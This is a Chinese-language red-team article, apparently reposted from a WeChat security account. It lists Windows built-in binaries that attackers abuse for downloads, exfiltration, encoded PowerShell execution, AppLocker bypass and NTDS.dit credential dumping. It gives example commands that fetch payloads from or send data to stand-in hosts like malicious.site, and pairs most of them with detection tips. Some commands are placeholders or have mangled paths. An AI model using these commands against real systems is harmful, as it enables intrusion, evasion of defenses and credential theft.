红队-数据传输技术

admin 2024年11月1日17:49:27评论10 views字数 3468阅读11分33秒阅读模式

红队-数据传输技术

命令执行程序

攻击者采用的技术之一是利用备用数据流 (ADS) 来隐藏恶意负载。此外,cmd.exe还可用于下载或上传文件,从而促进数据进出。

#Creating an Alternate Data Stream:
echo This is hidden data > legitfile.txt:hidden.txt

#Executing a PowerShell command using cmd.exe:
cmd.exe /c "powershell -Command "& {Write-Output 'Hello from PowerShell'}""

提示和技巧:始终监视cmd.exe不寻常或意外的命令行参数。考虑使用 Sysmon 记录命令行执行。

powershell.exe(编码和执行)

恶意行为者经常使用PowerShell 的 -EncodedCommand参数来执行 Base64 编码的命令,这使得检测和分析更具挑战性。

#Executing an Encoded PowerShell Command:
$command = "Write-Output 'Malicious Activity'"
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))

powershell.exe -EncodedCommand $encodedCommand

提示和技巧:启用 PowerShell 日志记录以捕获和分析所有已执行的脚本。考虑使用 Revoke-Obfuscation 等工具来检测混淆的 PowerShell 脚本。

certutil.exe(数据传输和编码)

Certutil.exe 是一个用于管理 Windows 中证书的命令行程序。然而,它能够下载文件和编码/解码数据,这使它成为攻击者的常用工具。他们可以滥用 certutil.exe 从远程服务器获取恶意负载或混淆数据以逃避检测。

#Downloading a File with Certutil:
certutil.exe -urlcache -split -f "http://malicious.site/payload.exe" payload.exe

#Decoding a Base64 Encoded File:
certutil.exe -decode encodedfile.txt decodedfile.exe

提示和技巧:监控任何网络连接或异常文件操作。如果在您的环境中certutil.exe没有合法使用certutil.exe ,请考虑阻止或限制其执行。

bash.exe(间接命令执行)

通过使用特定参数或脚本调用 Bash.exe,恶意行为者可以运行如果直接执行可能会被标记或阻止的命令。

命令

bash.exe -c "your_linux_command_here"

Powershell

Start-Process -NoNewWindow "bash.exe" -ArgumentList "-c your_linux_command_here"

bitsadmin.exe(文件传输)

Bitsadmin.exe 是一个命令行工具,可以创建和监控 BITS(后台智能传输服务)作业。虽然它的合法用途是在机器之间传输文件,但攻击者可能会滥用它来下载、上传甚至执行恶意文件。它在后台执行这些任务的能力可能会使检测更具挑战性。

命令

bitsadmin.exe /transfer job_name /download /priority normal http://malicious_url/malicious_file C:pathtosavemalicious_file

Powershell

Start-Process -NoNewWindow "bitsadmin.exe" -ArgumentList "/transfer job_name /download /priority normal http://malicious_url/malicious_file C:pathtosavemalicious_file"

certos.exe(文件传输)

CertOC.exe 是与 Windows 中的证书操作相关的合法二进制文件。但是,攻击者可能会滥用其功能来下载或执行恶意文件。通过使用特定参数调用 CertOC.exe,攻击者可以将文件从远程位置传输到本地计算机,从而可能绕过某些安全控制。

命令

CertOC.exe -parameter:[specific_parameters_for_transfer]

Powershell

Start-Process -NoNewWindow "CertOC.exe" -ArgumentList "-parameter:[specific_parameters_for_transfer]"

diantz.exe(NTFS 属性操作和文件传输)

Diatz.exe 是与存档功能相关的合法 Windows 二进制文件。攻击者可利用它来操纵 NTFS 文件属性,从而隐藏恶意活动或文件。此外,它还可用于从远程服务器下载恶意负载。

命令

Diantz.exe /option:C:pathtoinput http://malicious.site/payload

Powershell

Invoke-Expression "Diantz.exe /option:C:pathtoinput http://malicious.site/payload"

cmstp.exe(应用程序白名单绕过)

Cmstp.exe 是用于安装连接管理器服务配置文件的 Microsoft 二进制文件。攻击者发现,它可以被滥用来执行恶意脚本,并通过调用恶意 .inf 文件的安装来绕过应用程序白名单解决方案(例如 AppLocker)。

命令

cmstp.exe /s /ns C:pathtomalicious.inf

Powershell

Invoke-Expression "cmstp.exe /s /ns C:pathtomalicious.inf"

control.exe(恶意活动)

Control.exe 是 Windows 控制面板的主要可执行文件。攻击者可以通过调用已被篡改或被恶意版本替换的特定控制面板项 (.cpl 文件) 来滥用它。这可能导致一系列恶意活动,从信息窃取到系统入侵。

命令

control.exe C:pathtomalicious.cpl

Powershell

Invoke-Expression "control.exe C:pathtomalicious.cpl"
cscript(脚本执行和数据流操作)
Cscript.exe 是 Windows Script Host 的命令行版本,允许用户通过在命令提示符下键入脚本文件名来运行脚本。虽然它是为合法的脚本任务而设计的,但攻击者可以使用它来执行恶意脚本或操纵备用数据流。
命令
cscript.exe C:pathtoscript.vbs

Powershell

Invoke-Expression "cscript.exe C:pathtoscript.vbs"

DataSvcUtil.exe(通过 Web 服务渗透)

DataSvcUtil.exe 是一种用于生成数据服务类的工具。恶意行为者可能会滥用此工具,通过将数据发送到 Web 服务来窃取数据。监控网络流量和此二进制文件的行为有助于识别可疑活动。

命令

DataSvcUtil.exe /out:C:pathtooutput /uri:http://malicious.site

Powershell

Invoke-Expression "DataSvcUtil.exe /out:C:pathtooutput /uri:http://malicious.site"

Diskshadow.exe(NTDS 转储和间接命令执行)

Diskshadow.exe是用于磁盘影子复制的 Windows 实用程序。恶意行为者可能会滥用它来转储 NTDS.dit 文件,该文件包含 Active Directory 数据(包括用户凭据)。此外,它还可用于间接执行命令,允许攻击者在另一个进程的上下文中运行命令。

命令

Diskshadow.exe -s C:pathtoscript.txt

Powershell

Invoke-Expression "Diskshadow.exe -s C:pathtoscript.txt"

原文始发于微信公众号(Ots安全):红队-数据传输技术

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日17:49:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队-数据传输技术https://cn-sec.com/archives/3343685.html

发表评论

匿名网友 填写信息